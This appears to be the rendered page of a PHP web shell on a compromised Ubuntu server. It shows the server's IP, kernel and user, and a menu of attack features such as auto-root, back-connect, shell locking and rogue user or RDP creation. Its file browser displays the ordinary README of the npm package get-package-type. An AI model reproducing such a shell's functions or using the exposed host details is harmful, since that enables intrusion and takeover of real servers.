Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
get-package-type /
[ HOME SHELL ]
Name
Size
Permission
Action
CHANGELOG.md
356
B
-rw-rw-rw-
LICENSE
1.04
KB
-rw-rw-rw-
README.md
1.01
KB
-rw-rw-rw-
async.cjs
1.16
KB
-rw-rw-rw-
cache.cjs
43
B
-rw-rw-rw-
index.cjs
210
B
-rw-rw-rw-
is-node-modules.cjs
317
B
-rw-rw-rw-
package.json
886
B
-rw-rw-rw-
sync.cjs
912
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# get-package-type [![NPM Version][npm-image]][npm-url] Determine the `package.json#type` which applies to a location. ## Usage ```js const getPackageType = require('get-package-type'); (async () => { console.log(await getPackageType('file.js')); console.log(getPackageType.sync('file.js')); })(); ``` This function does not validate the value found in `package.json#type`. Any truthy value found will be returned. Non-truthy values will be reported as `commonjs`. The argument must be a filename. ```js // This never looks at `dir1/`, first attempts to load `./package.json`. const type1 = await getPackageType('dir1/'); // This attempts to load `dir1/package.json`. const type2 = await getPackageType('dir1/index.cjs'); ``` The extension of the filename does not effect the result. The primary use case for this module is to determine if `myapp.config.js` should be loaded with `require` or `import`. [npm-image]: https://img.shields.io/npm/v/get-package-type.svg [npm-url]: https://npmjs.org/package/get-package-type
Close